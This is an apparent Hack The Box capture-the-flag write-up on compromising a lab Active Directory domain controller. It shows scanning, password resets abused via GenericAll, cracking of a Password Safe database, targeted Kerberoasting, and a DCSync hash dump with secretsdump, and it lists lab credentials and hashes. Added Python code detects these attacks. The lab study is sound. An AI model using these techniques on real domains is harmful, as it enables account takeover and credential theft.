#hackthebox #medium #activedirectory
![[Pasted image 20250723003141.png]]
# Information Gathering
First, as always, I started off with scanning all TCP ports.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p- -oN tcpall
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-22 22:00 EDT
Nmap scan report for 10.10.11.42
Host is up (0.045s latency).
Not shown: 65503 closed tcp ports (reset), 6 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
57294/tcp open unknown
63557/tcp open unknown
63562/tcp open unknown
63565/tcp open unknown
63582/tcp open unknown
63614/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 14.46 seconds
```
Then I ran one more TCP scan against the open ports with the `-sCV` flags to get more information about the services.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sCV $IP -p 21,53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49668,57294,63557,63562,63565,63582,63614
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-22 22:02 EDT
Nmap scan report for 10.10.11.42
Host is up (0.048s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-23 09:02:15Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
57294/tcp open msrpc Microsoft Windows RPC
63557/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
63562/tcp open msrpc Microsoft Windows RPC
63565/tcp open msrpc Microsoft Windows RPC
63582/tcp open msrpc Microsoft Windows RPC
63614/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-07-23T09:03:12
|_ start_date: N/A
|_clock-skew: 6h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.11 seconds
```
Lastly, a UDP scan against the top 10 ports.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -sU $IP --min-rate 3000 --top-ports 10
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-22 22:04 EDT
Nmap scan report for 10.10.11.42
Host is up (0.047s latency).
PORT STATE SERVICE
53/udp open domain
67/udp open|filtered dhcps
123/udp open ntp
135/udp open|filtered msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
161/udp closed snmp
445/udp open|filtered microsoft-ds
631/udp open|filtered ipp
1434/udp open|filtered ms-sql-m
Nmap done: 1 IP address (1 host up) scanned in 0.54 seconds
```
---
# Enumeration
Looking at the Nmap results, this is almost certainly a Domain Controller: Kerberos, LDAP and DNS are all running. The LDAP scripts revealed the domain name (`administrator.htb`) and the `Service Info` line confirms the hostname is `DC`.
The box is based on an `Assumed Breach` scenario, so we are given a set of valid credentials: `Olivia:ichliebedich`.
Let's first check that the credentials are actually valid and that the user exists in the domain.
##### SMB - TCP 445
`nxc` confirms that the user `olivia` exists and that the credentials are valid.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nxc smb $IP -u olivia -p ichliebedich
SMB 10.10.11.42 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.42 445 DC [+] administrator.htb\olivia:ichliebedich
```
The `SYSVOL` and `NETLOGON` shares once again prove that it's a DC, because those two are standard shares on any Domain Controller.
![[Pasted image 20250722211344.png]]
Enumerated users with `nxc`:
![[Pasted image 20250722211509.png]]
##### FTP - TCP 21
FTP is running on port 21, but `olivia` doesn't have access to it and anonymous login is not allowed. Let's come back to this later when we get more valid creds.
##### WinRM - TCP 5985
`nxc` confirmed Olivia has access to WinRM, so I logged in via `evil-winrm`.
![[Pasted image 20250722212501.png]]
As expected, Olivia doesn't have many privileges in the domain.
![[Pasted image 20250722212728.png]]
In `C:\inetpub` there was an `ftproot` directory that stood out to me, but unfortunately I was not able to access it with the current user's privileges.
![[Pasted image 20250722213505.png]]
##### Bloodhound
I think we've seen enough with the current user's privileges; let's fire up BloodHound to see whether we can move laterally within the domain and ultimately escalate to Domain Admin.
Let's first run `bloodhound-python` to collect the data.
![[Pasted image 20250722214024.png]]
After uploading the zip file, the first thing I did was mark Olivia as `owned`. She has one outbound edge to the user `Michael`, over whom Olivia has `GenericAll` permissions.
![[Pasted image 20250722214246.png]]
When someone has `GenericAll` permissions over a user, the easiest abuse is a `Force Change Password` attack. The best thing about BloodHound is that it shows you how to execute it.
![[Pasted image 20250722214817.png]]
![[Pasted image 20250722215643.png]]
Successfully logged in as `michael`, but I still wasn't able to access the `ftproot` directory.
![[Pasted image 20250722215719.png]]
Back in BloodHound, I marked `Michael` as owned. Michael has an outbound edge to `Benjamin`, so Michael can change Benjamin's password as well. We basically repeat the same steps, this time as `Michael` with `Benjamin` as the target.
![[Pasted image 20250722220221.png]]
Since Benjamin is not a member of the `Remote Management Users` group, `nxc` against `winrm` failed. However, he does have access to `FTP`! That's something.
![[Pasted image 20250722221103.png]]
![[Pasted image 20250722221154.png]]
Successfully logged into FTP server as Benjamin. There was `Backup.psafe3` which I downloaded for investigation.
![[Pasted image 20250722221403.png]]
It's a `Password Safe V3 database` file. Honestly, it's my first time seeing this file type haha.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ file Backup.psafe3
Backup.psafe3: Password Safe V3 database
```
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ cat Backup.psafe3
PWS3OI&:ҫY*5Ջ:WyGk1rRA
MUoj{F=maSaMz9[+C^<|L@6M<eQQ
5_Q}_
">Iuer ZGakk>YO]B"btwQ
i<Bg^ƈELKAD/P\jD]^jԫ3+Q>hqB ȗiYqox!og%oucq-tބ-]zq5Զ
(4j8JHtmh:^hNnI{+1Gw,rRh;cpSPM>5h>a2g@ģ]js{WkXí[;yqY!Zyk59Ft
#
\9h?s=~GLbH3&CdXj3pA]0|"hBkk(vG^~E!&'|&):A*<|$D|K
U7xDNy 3Q<
```
It's an encrypted `Password Safe v3` database, so it presumably stores password entries.
![[Pasted image 20250722221844.png]]
I first converted it to a hash with `pwsafe2john` and tried to crack that, but it kept failing.
![[Pasted image 20250722223757.png]]
The `hashcat` website lists mode `5200` for Password Safe v3.
![[Pasted image 20250722224556.png]]
I just passed the file itself to Hashcat with mode 5200, without converting it to a hash first, and to my surprise it was cracked! Mode 5200 reads the `.psafe3` file directly, which is why the `pwsafe2john` step was unnecessary.
![[Pasted image 20250722224752.png]]
Now that we know the master password, we need `Password Safe` itself to open the database. I grabbed the latest release, `passwordsafe-debian12-1.22-amd64.deb`, from the project's GitHub repository [here](https://github.com/pwsafe/pwsafe/releases).
![[Pasted image 20250722225756.png]]
Password Safe prompted me for the Master Password. I entered the password we cracked, and the database turned out to contain 3 passwords:
`alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw`
`emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb`
`emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur`
![[Pasted image 20250722225918.png]]
I'm currently interested in the user `emily` because she's the only one of the three with access to `WinRM`. How do I know? I looked them up in BloodHound, and Emily is a member of the `Remote Management Users` group.
![[Pasted image 20250722230538.png]]
Just to be sure, I checked with `nxc`, and it confirmed that I'm able to connect to WinRM as `emily`.
![[Pasted image 20250722230823.png]]
Found `user.txt`
![[Pasted image 20250722231115.png]]
# Privilege Escalation
BloodHound again reveals that Emily has an outbound edge to `Ethan`, over whom Emily has `GenericWrite` permissions. BloodHound explains that `GenericWrite` grants the ability to write to any non-protected attribute on the target object.
Simply put, as Emily I can set an SPN on Ethan, which can be abused in a targeted Kerberoast attack.
![[Pasted image 20250722231745.png]]
BloodHound suggests that a targeted Kerberoast attack can be performed with `targetedKerberoast.py`, which can be downloaded from [here](https://github.com/ShutdownRepo/targetedKerberoast).
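The two primitives abused on this box (a password reset via `GenericAll`, an SPN written onto a user via `GenericWrite`) both leave traces in the DC's Security log. The detector below is an added example, not part of the original writeup: it runs over a constructed sample of events 4724 (password reset attempted) and 5136 (directory object modified), assumes directory-service-change auditing is enabled, and links the findings into the attacker-to-victim chain seen here.

```python
# Constructed sample of Windows Security events, reduced to the fields the detection
# needs. 4724 = an attempt was made to reset an account's password; 5136 = a directory
# service object was modified. Names mirror this writeup; the last event is benign.
EVENTS = [
    {"EventID": 4724, "SubjectUserName": "olivia", "TargetUserName": "michael"},
    {"EventID": 4724, "SubjectUserName": "michael", "TargetUserName": "benjamin"},
    {"EventID": 5136, "SubjectUserName": "emily", "ObjectClass": "user",
     "ObjectDN": "CN=Ethan,CN=Users,DC=administrator,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName", "AttributeValue": "http/demo"},
    {"EventID": 4724, "SubjectUserName": "helpdesk-svc", "TargetUserName": "alexander"},
]
# Assumption: accounts that legitimately reset passwords (helpdesk tooling, self-service).
ALLOWED_RESETTERS = {"helpdesk-svc"}

def cn(dn: str) -> str:
    """Return the lower-cased CN of a distinguished name ('CN=Ethan,CN=Users,...' -> 'ethan')."""
    return dn.split(",")[0].split("=", 1)[1].lower()

def detect(events):
    """Flag password resets by non-approved actors and SPNs added to user objects."""
    findings = []
    for e in events:
        if e["EventID"] == 4724 and e["SubjectUserName"] not in ALLOWED_RESETTERS:
            findings.append(("force-change-password", e["SubjectUserName"], e["TargetUserName"]))
        elif (e["EventID"] == 5136 and e.get("ObjectClass") == "user"
              and e.get("AttributeLDAPDisplayName", "").lower() == "serviceprincipalname"):
            findings.append(("spn-added-to-user", e["SubjectUserName"], cn(e["ObjectDN"])))
    return findings

def chains(findings):
    """Join findings where a victim later acts as the actor: olivia -> michael -> benjamin."""
    edges = {}
    for _, actor, victim in findings:
        edges.setdefault(actor, []).append(victim)
    victims = {v for vs in edges.values() for v in vs}
    paths = []
    def walk(node, path):
        if node not in edges:
            paths.append(" -> ".join(path))
            return
        for nxt in edges[node]:
            walk(nxt, path + [nxt])
    for root in edges:
        if root not in victims:  # start only from actors nobody compromised first
            walk(root, [root])
    return paths

if __name__ == "__main__":
    for path in chains(detect(EVENTS)):
        print("suspicious chain:", path)
```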
I spent so much time trying to get this `targetedKerberoast.py` exploit to work. No matter how hard I tried, I kept facing the following error: `KRB_AP_ERR_SKEW(Clock skew too great)`.
I know how important timestamps are for Kerberos-based attacks: the earlier Nmap scan already reported a `clock-skew` of almost seven hours, far beyond the five minutes Kerberos tolerates by default. I tried to sync my time using `sudo ntpdate administrator.htb`, but it didn't work.
What worked for me were the troubleshooting steps from this [blog](https://medium.com/@danieldantebarnes/fixing-the-kerberos-sessionerror-krb-ap-err-skew-clock-skew-too-great-issue-while-kerberoasting-b60b0fe20069).
Anyway, I got the ticket.
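The skew can be measured before any Kerberos request is sent, from the `-sCV` output alone. This added example (not from the writeup) parses the scan start time and the `server time` the `kerberos-sec` probe reports, and checks the difference against the default 5-minute tolerance; the timezone abbreviation table is an assumption and covers only the zones shown.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed sample: the two lines of an Nmap -sCV run that matter here, with the
# values from the scan in this writeup (local time is EDT, KDC time is reported in UTC).
NMAP_OUTPUT = """\
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-22 22:02 EDT
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-23 09:02:15Z)
"""

# Default maximum tolerable clock skew for Kerberos (MIT krb5 and Active Directory).
MAX_SKEW = timedelta(minutes=5)

# Assumption: UTC offsets for the timezone abbreviations Nmap may print; extend as needed.
TZ_OFFSETS = {"EDT": -4, "EST": -5, "UTC": 0}

def kerberos_skew(nmap_text: str) -> timedelta:
    """Return KDC time minus local scan time, both normalised to UTC."""
    start = re.search(r"\) at (\d{4}-\d{2}-\d{2} \d{2}:\d{2}) (\w+)", nmap_text)
    kdc = re.search(r"server time: (\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})Z", nmap_text)
    if not start or not kdc:
        raise ValueError("scan start time or Kerberos server time not found")
    local_tz = timezone(timedelta(hours=TZ_OFFSETS[start.group(2)]))
    local = datetime.strptime(start.group(1), "%Y-%m-%d %H:%M").replace(tzinfo=local_tz)
    server = datetime.strptime(kdc.group(1), "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
    return server - local

def skew_ok(nmap_text: str) -> bool:
    """True when the skew is within tolerance, i.e. no KRB_AP_ERR_SKEW is expected."""
    return abs(kerberos_skew(nmap_text)) <= MAX_SKEW

if __name__ == "__main__":
    delta = kerberos_skew(NMAP_OUTPUT)
    print(f"KDC clock is {delta} ahead of ours; within Kerberos tolerance: {skew_ok(NMAP_OUTPUT)}")
```

The scan-start line has minute resolution, so the result is accurate to about a minute, which is enough to decide whether the clock needs fixing first.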
![[Pasted image 20250723000133.png]]
Successfully cracked the hash: `limpbizkit`.
![[Pasted image 20250723000839.png]]
Ethan doesn't have access to `WinRM`.
![[Pasted image 20250723001222.png]]
Collected data for BloodHound again, this time as our newly found user `ethan`.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ bloodhound-python -u ethan -p limpbizkit -d administrator.htb -ns $IP -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 00M 08S
INFO: Compressing output into 20250723121357_bloodhound.zip
```
It appears that the user `ethan` can perform a `DCSync` attack against the domain `administrator.htb`.
![[Pasted image 20250723002614.png]]
Now let's dump the hashes for the domain `administrator.htb` with `secretsdump.py`.
```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ impacket-secretsdump ethan:limpbizkit@administrator.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9fd20bd016e098d2d2fd2e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:8864a202387fccd97844b924072e1467:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:95687598bfb05cd32eaa2831e0ae6850:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:9d453509ca9b7bec02ea8c2161d2d340fd94bf30cc7e52cb94853a04e9e69664
Administrator:aes128-cts-hmac-sha1-96:08b0633a8dd5f1d6cbea29014caea5a2
<SNIP>
...
```
Finally logged in as `administrator`.
![[Pasted image 20250723003021.png]]
Found `root.txt`
![[Pasted image 20250723003100.png]]